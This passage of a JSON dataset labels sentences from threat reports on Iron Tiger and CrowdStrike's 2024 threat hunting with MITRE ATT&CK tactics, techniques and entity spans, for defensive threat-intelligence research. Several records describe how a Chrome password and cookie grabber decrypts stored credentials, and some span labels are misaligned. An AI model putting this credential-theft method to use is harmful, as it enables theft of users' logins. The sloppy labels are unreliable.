"sentence_text": "This suggests that some chat application named “i Talk” might be repackaging components from the official Youdu client along with malicious executables.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p9-s88-168d7d", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 9, "sentence_id": 88, "context_before": "This suggests that some chat application named “i Talk” might be repackaging components from the official Youdu client along with malicious executables.", "sentence_text": "It appears that a chat application was used as a lure to entice the victim into opening the malicious file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p9-s89-701cdc", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 9, "sentence_id": 89, "context_before": "It appears that a chat application was used as a lure to entice the victim into opening the malicious file.", "sentence_text": "Post-exploitation tools\nWe found a custom Chrome password and cookie grabber that appeared unfamiliar, and it was compiled and uploaded in September 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p9-s90-7c1675", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 9, "sentence_id": 90, "context_before": "Post-exploitation tools\nWe found a custom Chrome password and cookie grabber that appeared unfamiliar, and it was compiled and uploaded in September 2022.", "sentence_text": "The file was also signed with the VMProtect certificate but it was not obfuscated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p9-s91-999d9f", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 9, "sentence_id": 91, "context_before": "The file was also signed with the VMProtect certificate but it was not obfuscated.", "sentence_text": "In general, the features were simple; the malware 9/11", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p10-s92-646af4", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 10, "sentence_id": 92, "context_before": "In general, the features were simple; the malware 9/11", "sentence_text": "decrypts the saved passwords to a file named “passwords.txt”, and the cookies to a file named “cookies.txt”.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" } ], "procedure": "Decrypt stored passwords and cookies and save them into local files.", "entities": [ { "text": "decrypts the saved passwords", "start": 0, "end": 28, "label": "Action" }, { "text": "passwords.txt", "start": 46, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "cookies.txt", "start": 95, "end": 106, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-21_aptnotes_report-p10-s93-c552ea", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 10, "sentence_id": 93, "context_before": "decrypts the saved passwords to a file named “passwords.txt”, and the cookies to a file named “cookies.txt”.", "sentence_text": "Analyzing its details, the malware first parses the “Local State” file to retrieve the AES key used to encrypt the cookies and passwords.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" } ], "procedure": "Parse the Local State file to extract the AES key used to decrypt stored credentials.", "entities": [ { "text": "parses the “Local State” file", "start": 41, "end": 70, "label": "Action" }, { "text": "retrieve the AES key", "start": 74, "end": 94, "label": "Action" }, { "text": "Local State", "start": 53, "end": 64, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-21_aptnotes_report-p10-s94-7f58d9", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 10, "sentence_id": 94, "context_before": "Analyzing its details, the malware first parses the “Local State” file to retrieve the AES key used to encrypt the cookies and passwords.", "sentence_text": "It then copies the “Login Data” file to a temporary file “chromedb_tmp”, issues an SQL query to extract the URL, login, and password fields from the file, and then decrypts them and appends the result to the “passwords.txt” file.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" } ], "procedure": "Copy browser credential database, query it to extract credentials, decrypt them, and store them in a local file.", "entities": [ { "text": "copies the “Login Data” file", "start": 8, "end": 36, "label": "Action" }, { "text": "issues an SQL query to extract the URL, login, and password fields", "start": 73, "end": 139, "label": "Action" }, { "text": "decrypts them", "start": 164, "end": 177, "label": "Action" }, { "text": "appends the result to the “passwords.txt” file", "start": 182, "end": 228, "label": "Action" }, { "text": "Login Data", "start": 20, "end": 30, "label": "Infrastructure_Indicator" }, { "text": "chromedb_tmp", "start": 58, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "passwords.txt", "start": 209, "end": 222, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-21_aptnotes_report-p10-s95-b8940a", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 10, "sentence_id": 95, "context_before": "It then copies the “Login Data” file to a temporary file “chromedb_tmp”, issues an SQL query to extract the URL, login, and password fields from the file, and then decrypts them and appends the result to the “passwords.txt” file.", "sentence_text": "It proceeds to copy the “Cookies” file to a temporary file “chromedb_tmp”, extracts multiple fields from it using an SQL query, and then decrypts the content before copying the result to the “cookies.txt” file.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" }, { "id": "T1005", "name": "Data from Local System" } ], "procedure": "Copy browser Cookies database, extract fields via SQL queries, decrypt content, and store results in a local file.", "entities": [ { "text": "copy the “Cookies” file to a temporary file “chromedb_tmp”, extracts multiple fields from it using an SQL query, and then decrypts the content before copying the result to the “cookies.txt” file", "start": 15, "end": 209, "label": "Action" } ] }, { "uid": "aptnotes-21_aptnotes_report-p10-s96-9fdebc", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 10, "sentence_id": 96, "context_before": "It proceeds to copy the “Cookies” file to a temporary file “chromedb_tmp”, extracts multiple fields from it using an SQL query, and then decrypts the content before copying the result to the “cookies.txt” file.", "sentence_text": "Some specific cookies related to Google domain names are ignored, probably because they are mostly related to specific Google features or tracking that are considered useless by the threat actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p10-s97-73b03d", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 10, "sentence_id": 97, "context_before": "Some specific cookies related to Google domain names are ignored, probably because they are mostly related to specific Google features or tracking that are considered useless by the threat actor.", "sentence_text": "Targeting\nWe identified one gambling company in the Philippines as compromised by this campaign.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p10-s98-05a8c8", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 10, "sentence_id": 98, "context_before": "Targeting\nWe identified one gambling company in the Philippines as compromised by this campaign.", "sentence_text": "We also attempted to notify the company of this incident through all their listed channels but have received no feedback.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p10-s99-4acf84", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 10, "sentence_id": 99, "context_before": "We also attempted to notify the company of this incident through all their listed channels but have received no feedback.", "sentence_text": "As stated in the “Infection Vector” section, we noticed the Youdu chat application was probably used as a lure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p10-s100-b27ee8", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 10, "sentence_id": 100, "context_before": "As stated in the “Infection Vector” section, we noticed the Youdu chat application was probably used as a lure.", "sentence_text": "It is worth mentioning that the customers mentioned in the Youdu official website are all located inside China, which could be an indicator of the threat actor’s interest in targets related to this country.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p10-s101-a1a835", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 10, "sentence_id": 101, "context_before": "It is worth mentioning that the customers mentioned in the Youdu official website are all located inside China, which could be an indicator of the threat actor’s interest in targets related to this country.", "sentence_text": "Conclusion\nThis investigation confirms that Iron Tiger regularly updates its tools to add new features and probably to ease their portability to other platforms, verifying the interest we found from this threat actor for Linux or Mac OS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p10-s102-4fb2cb", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 10, "sentence_id": 102, "context_before": "Conclusion\nThis investigation confirms that Iron Tiger regularly updates its tools to add new features and probably to ease their portability to other platforms, verifying the interest we found from this threat actor for Linux or Mac OS.", "sentence_text": "It also corroborates this threat actor’s interest in the gambling industry and the South East Asia region, as we previously noted in 2020 and 2021.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p10-s103-0b044b", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 10, "sentence_id": 103, "context_before": "It also corroborates this threat actor’s interest in the gambling industry and the South East Asia region, as we previously noted in 2020 and 2021.", "sentence_text": "This campaign also substantiates the regular usage of chat applications as infection vectors from Iron Tiger.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p10-s104-66f673", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 10, "sentence_id": 104, "context_before": "This campaign also substantiates the regular usage of chat applications as infection vectors from Iron Tiger.", "sentence_text": "We expect to find further updates of these tools in the future to accommodate other platforms and apps.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p11-s106-5dc63a", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 11, "sentence_id": 106, "context_before": "10/11", "sentence_text": "As an additional warning, we want to highlight that the targeting can be wider than the samples and targeting we have already observed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p11-s107-b39860", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 11, "sentence_id": 107, "context_before": "As an additional warning, we want to highlight that the targeting can be wider than the samples and targeting we have already observed.", "sentence_text": "In 2022, we discussed a campaign targeting Taiwan and the Philippines that made use of HyperBro samples (detected by Trend Micro as Backdoor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p11-s108-0cf564", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 11, "sentence_id": 108, "context_before": "In 2022, we discussed a campaign targeting Taiwan and the Philippines that made use of HyperBro samples (detected by Trend Micro as Backdoor.", "sentence_text": "Win32.HYPERBRO.ENC) signed with a stolen Cheetah certificate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p11-s109-d55b3a", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 11, "sentence_id": 109, "context_before": "Win32.HYPERBRO.ENC) signed with a stolen Cheetah certificate.", "sentence_text": "In October 2022, Intrinsec reported an incident in a French company also using HyperBro samples matching the structure we described in our 2021 investigation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p11-s110-8c8d84", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 11, "sentence_id": 110, "context_before": "In October 2022, Intrinsec reported an incident in a French company also using HyperBro samples matching the structure we described in our 2021 investigation.", "sentence_text": "This shows the threat actor is likely to reuse the tools mentioned here in future campaigns that might target different regions or industries in the short and long term.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p11-s111-dc4e20", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 11, "sentence_id": 111, "context_before": "This shows the threat actor is likely to reuse the tools mentioned here in future campaigns that might target different regions or industries in the short and long term.", "sentence_text": "Considering the active campaign and regular developments made on this malware family, organizations are advised to enhance and broaden their current and established security measures, and heighten overall vigilance for possible infection vectors that can be abused by this threat group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p11-s112-f070e3", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 11, "sentence_id": 112, "context_before": "Considering the active campaign and regular developments made on this malware family, organizations are advised to enhance and broaden their current and established security measures, and heighten overall vigilance for possible infection vectors that can be abused by this threat group.", "sentence_text": "Indicators of Compromise (IOCs)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-21_aptnotes_report-p11-s113-aceba1", "source": "aptnotes", "doc_id": "21_aptnotes_report", "page_number": 11, "sentence_id": 113, "context_before": "Indicators of Compromise (IOCs)", "sentence_text": "Download the full list of indicators here.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p2-s3-6e63a0", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 2, "sentence_id": 3, "context_before": "I V E S U M M A R Y", "sentence_text": "Introduction\nStealth and speed were the dominant themes of the 2023 cyber threat landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p2-s4-d1056a", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 2, "sentence_id": 4, "context_before": "Introduction\nStealth and speed were the dominant themes of the 2023 cyber threat landscape.", "sentence_text": "This executive summary of the CrowdStrike 2024 Threat Hunting Report highlights key trends from the report to help organizations better understand the current threat landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p2-s5-c37338", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 2, "sentence_id": 5, "context_before": "This executive summary of the CrowdStrike 2024 Threat Hunting Report highlights key trends from the report to help organizations better understand the current threat landscape.", "sentence_text": "Adversaries continue to innovate their tactics and expand their use of proven techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p2-s6-4d1c53", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 2, "sentence_id": 6, "context_before": "Adversaries continue to innovate their tactics and expand their use of proven techniques.", "sentence_text": "industry-leading threat intelligence and pioneering managed threat hunting with the AI-powered CrowdStrike Falcon® platform to detect, disrupt and stop today’s sophisticated adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p2-s7-d93cc5", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 2, "sentence_id": 7, "context_before": "industry-leading threat intelligence and pioneering managed threat hunting with the AI-powered CrowdStrike Falcon® platform to detect, disrupt and stop today’s sophisticated adversaries.", "sentence_text": "Their efforts safeguard thousands of customers from the most advanced adversaries by providing the intelligence, resources and threat hunting skills that most organizations lack.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p2-s8-517f19", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 2, "sentence_id": 8, "context_before": "Their efforts safeguard thousands of customers from the most advanced adversaries by providing the intelligence, resources and threat hunting skills that most organizations lack.", "sentence_text": "The CrowdStrike 2024 Threat Hunting Report highlights the trends this team has observed over the past 12 months and details how the threat hunting to relentlessly track, detect and ultimately disrupt adversaries no matter when or where they operate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p3-s9-b82b6f", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 3, "sentence_id": 9, "context_before": "The CrowdStrike 2024 Threat Hunting Report highlights the trends this team has observed over the past 12 months and details how the threat hunting to relentlessly track, detect and ultimately disrupt adversaries no matter when or where they operate.", "sentence_text": "During interactive intrusions, threat actors operate with hands-on-keyboard activities in a victim’s environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p3-s10-259aeb", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 3, "sentence_id": 10, "context_before": "During interactive intrusions, threat actors operate with hands-on-keyboard activities in a victim’s environment.", "sentence_text": "Interactive intrusions are typically more sophisticated and difficult to detect compared to automated attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p3-s11-e48b64", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 3, "sentence_id": 11, "context_before": "Interactive intrusions are typically more sophisticated and difficult to detect compared to automated attacks.", "sentence_text": "► 86% of all interactive intrusions were attributed to eCrime activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p3-s12-39ef8f", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 3, "sentence_id": 12, "context_before": "► 86% of all interactive intrusions were attributed to eCrime activity.", "sentence_text": "This highlights the increased threat posed by eCrime threat actors seeking financial gain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p3-s13-1d5524", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 3, "sentence_id": 13, "context_before": "This highlights the increased threat posed by eCrime threat actors seeking financial gain.", "sentence_text": "► eCrime-related interactive intrusions against the healthcare sector increased 75%.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p3-s14-9087d4", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 3, "sentence_id": 14, "context_before": "► eCrime-related interactive intrusions against the healthcare sector increased 75%.", "sentence_text": "The abundance of sensitive health and financial information makes the healthcare sector an increasingly popular target for eCrime threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p3-s15-cec5c6", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 3, "sentence_id": 15, "context_before": "The abundance of sensitive health and financial information makes the healthcare sector an increasingly popular target for eCrime threat actors.", "sentence_text": "► Interactive intrusions impacting the technology sector increased 60%, making technology the most frequently targeted industry for the seventh consecutive year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p3-s16-71c83b", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 3, "sentence_id": 16, "context_before": "► Interactive intrusions impacting the technology sector increased 60%, making technology the most frequently targeted industry for the seventh consecutive year.", "sentence_text": "► Adversary use of remote monitoring and management (RMM) tools increased 70%, and 27% of all interactive intrusions leveraged RMM tools.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "use of RMM tools", "entities": [ { "text": "f remote monitoring and management (RMM) ", "start": 17, "end": 58, "label": "MalwareTool" }, { "text": "RMM tools.", "start": 127, "end": 137, "label": "MalwareTool" }, { "text": "l interactive intrusions", "start": 92, "end": 116, "label": "Action" }, { "text": " leveraged ", "start": 116, "end": 127, "label": "Action" } ] }, { "uid": "crowdstrike-40_crowdstrike_report-p3-s17-1f1015", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 3, "sentence_id": 17, "context_before": "► Adversary use of remote monitoring and management (RMM) tools increased 70%, and 27% of all interactive intrusions leveraged RMM tools.", "sentence_text": "ConnectWise ScreenConnect surpassed AnyDesk to become the most observed RMM tool.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "use of ConnectWise ScreenConnect and AnyDesk RMM tools", "entities": [ { "text": "ConnectWise ScreenConnect", "start": 0, "end": 25, "label": "MalwareTool" }, { "text": "AnyDesk ", "start": 36, "end": 44, "label": "MalwareTool" }, { "text": "RMM tool", "start": 72, "end": 80, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-40_crowdstrike_report-p3-s18-0c4f5d", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 3, "sentence_id": 18, "context_before": "ConnectWise ScreenConnect surpassed AnyDesk to become the most observed RMM tool.", "sentence_text": "FRONT-LINE SNAPSHOT\nAll statistics provided in the CrowdStrike 2024 Threat Hunting Report and this executive summary specifically focus on interactive intrusions: attacks where adversaries establish an active presence within a target network, often engaging in hands-on-keyboard activities to achieve their objectives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p3-s19-b279ca", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 3, "sentence_id": 19, "context_before": "FRONT-LINE SNAPSHOT\nAll statistics provided in the CrowdStrike 2024 Threat Hunting Report and this executive summary specifically focus on interactive intrusions: attacks where adversaries establish an active presence within a target network, often engaging in hands-on-keyboard activities to achieve their objectives.", "sentence_text": "Notably, the graphic also shows that the overall distribution of interactive intrusion activity by threat type saw a noted increase in activity by eCrime adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p3-s20-07468d", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 3, "sentence_id": 20, "context_before": "Notably, the graphic also shows that the overall distribution of interactive intrusion activity by threat type saw a noted increase in activity by eCrime adversaries.", "sentence_text": "86% of the total volume was associated with eCrime activity, highlighting the increased threat posed by criminal threat actors seeking financial gain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p4-s21-0aaeb0", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 4, "sentence_id": 21, "context_before": "86% of the total volume was associated with eCrime activity, highlighting the increased threat posed by criminal threat actors seeking financial gain.", "sentence_text": "Interactive Intrusions Over Time | Q3 2022 - Q2 2024 Interactive Intrusions by Motivation Top Sectors by Intrusion Frequency Q3 2023-Q2 2024 Q3 2023-Q2 2024 TECHNOLOGY TARGETED CONSULTING & PROFESSIONAL SERVICES 14% INTRUSIONS FINANCIAL SERVICES", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p4-s22-1320cf", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 4, "sentence_id": 22, "context_before": "Interactive Intrusions Over Time | Q3 2022 - Q2 2024 Interactive Intrusions by Motivation Top Sectors by Intrusion Frequency Q3 2023-Q2 2024 Q3 2023-Q2 2024 TECHNOLOGY TARGETED CONSULTING & PROFESSIONAL SERVICES 14% INTRUSIONS FINANCIAL SERVICES", "sentence_text": "HEALTHCARE RETAIL 86% eCRIME MANUFACTURING TELECOMMUNICATIONS GOVERNMENT INDUSTRIALS & ENGINEERING ACADEMIC", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p5-s23-d5715a", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 5, "sentence_id": 23, "context_before": "HEALTHCARE RETAIL 86% eCRIME MANUFACTURING TELECOMMUNICATIONS GOVERNMENT INDUSTRIALS & ENGINEERING ACADEMIC", "sentence_text": "Sector Targeting\nFor the reporting period, interactive intrusions impacting technology entities increased 60% year-over-year, making technology the most frequently targeted industry for the seventh consecutive year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p5-s24-5e7e3a", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 5, "sentence_id": 24, "context_before": "Sector Targeting\nFor the reporting period, interactive intrusions impacting technology entities increased 60% year-over-year, making technology the most frequently targeted industry for the seventh consecutive year.", "sentence_text": "Due to its relationship to many other verticals, the technology sector is a high-value target for both targeted intrusion and eCrime adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p5-s25-43d75b", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 5, "sentence_id": 25, "context_before": "Due to its relationship to many other verticals, the technology sector is a high-value target for both targeted intrusion and eCrime adversaries.", "sentence_text": "Top Sectors by Intrusion Frequency JULY 2022 - JUNE 2023 JULY 2023 - JUNE 2024 TECHNOLOGY 60% CONSULTING AND PROFESSIONAL SERVICES 58% FINANCIAL SERVICES 25% HEALTHCARE 70% RETAIL 55% MANUFACTURING 57% TELECOMMUNICATIONS 42% GOVERNMENT 84% INDUSTRIALS AND ENGINEERING 93% ACADEMIC 2% REAL ESTATE 102% MEDIA 51% ENERGY 94% HOSPITALITY 60% UTILITIES 7% ▼ Targeted Intrusion VS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p5-s26-1647cc", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 5, "sentence_id": 26, "context_before": "Top Sectors by Intrusion Frequency JULY 2022 - JUNE 2023 JULY 2023 - JUNE 2024 TECHNOLOGY 60% CONSULTING AND PROFESSIONAL SERVICES 58% FINANCIAL SERVICES 25% HEALTHCARE 70% RETAIL 55% MANUFACTURING 57% TELECOMMUNICATIONS 42% GOVERNMENT 84% INDUSTRIALS AND ENGINEERING 93% ACADEMIC 2% REAL ESTATE 102% MEDIA 51% ENERGY 94% HOSPITALITY 60% UTILITIES 7% ▼ Targeted Intrusion VS.", "sentence_text": "eCrime ▼ TECHNOLOGY 82% TECHNOLOGY 44% CONSULTING AND TELECOMMUNICATIONS 52% PROFESSIONAL SERVICES 41% CONSULTING AND HEALTHCARE PROFESSIONAL SERVICES 141% 75% FINANCIAL SERVICES 109% RETAIL 36% GOVERNMENT 160% MANUFACTURING 43%", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p6-s27-c94def", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 6, "sentence_id": 27, "context_before": "eCrime ▼ TECHNOLOGY 82% TECHNOLOGY 44% CONSULTING AND TELECOMMUNICATIONS 52% PROFESSIONAL SERVICES 41% CONSULTING AND HEALTHCARE PROFESSIONAL SERVICES 141% 75% FINANCIAL SERVICES 109% RETAIL 36% GOVERNMENT 160% MANUFACTURING 43%", "sentence_text": "Intrusion Trends\nThe report offers insights into sophisticated hands-on-keyboard intrusions designed to evade detection, including cross-domain attacks, credential abuse, cloud control plan exploits and remote access tool manipulation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p6-s28-4f5998", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 6, "sentence_id": 28, "context_before": "Intrusion Trends\nThe report offers insights into sophisticated hands-on-keyboard intrusions designed to evade detection, including cross-domain attacks, credential abuse, cloud control plan exploits and remote access tool manipulation.", "sentence_text": "Below is a summary of the top intrusion trends.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p6-s29-51429c", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 6, "sentence_id": 29, "context_before": "Below is a summary of the top intrusion trends.", "sentence_text": "The rise of stealthy cross-domain attacks to evade detection Adversaries are increasingly targeting multiple domains across an organization’s infrastructure — most notably identity, cloud and endpoint — in their efforts to evade detection.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1484", "name": "Domain or Tenant Policy Modification" } ], "procedure": "targeting multiple domains (identity, cloud, endpoint) to evade detection", "entities": [ { "text": "targeting ", "start": 90, "end": 100, "label": "Action" }, { "text": "cloud and endpoint", "start": 182, "end": 200, "label": "Infrastructure_Indicator" }, { "text": " evade detection", "start": 222, "end": 238, "label": "Action" }, { "text": "Adversaries", "start": 61, "end": 72, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-40_crowdstrike_report-p6-s30-479ce0", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 6, "sentence_id": 30, "context_before": "The rise of stealthy cross-domain attacks to evade detection Adversaries are increasingly targeting multiple domains across an organization’s infrastructure — most notably identity, cloud and endpoint — in their efforts to evade detection.", "sentence_text": "These cross-domain threats pose a challenge to threat hunters because they often generate fewer detections in a single domain or product, making the activity difficult to recognize as malicious.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-40_crowdstrike_report-p6-s31-93892d", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 6, "sentence_id": 31, "context_before": "These cross-domain threats pose a challenge to threat hunters because they often generate fewer detections in a single domain or product, making the activity difficult to recognize as malicious.", "sentence_text": "The cross-domain threat is growing as adversaries attempt to infiltrate targets through human access, commonly known as “insider threats,” which exploit trusted access to cause harm.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1199", "name": "Trusted Relationship" } ], "procedure": "infiltrate targets through human access / insider threats", "entities": [ { "text": "adversaries", "start": 38, "end": 49, "label": "ThreatActor" }, { "text": "infiltrate targets", "start": 61, "end": 79, "label": "Action" }, { "text": "cross-domain", "start": 4, "end": 16, "label": "Action" }, { "text": "exploit trusted access to cause harm", "start": 145, "end": 181, "label": "Action" } ] }, { "uid": "crowdstrike-40_crowdstrike_report-p6-s32-0561f6", "source": "crowdstrike", "doc_id": "40_crowdstrike_report", "page_number": 6, "sentence_id": 32, "context_before": "The cross-domain threat is growing as adversaries attempt to infiltrate targets through human access, commonly known as “insider threats,” which exploit trusted access to cause harm.", "sentence_text": "These attacks 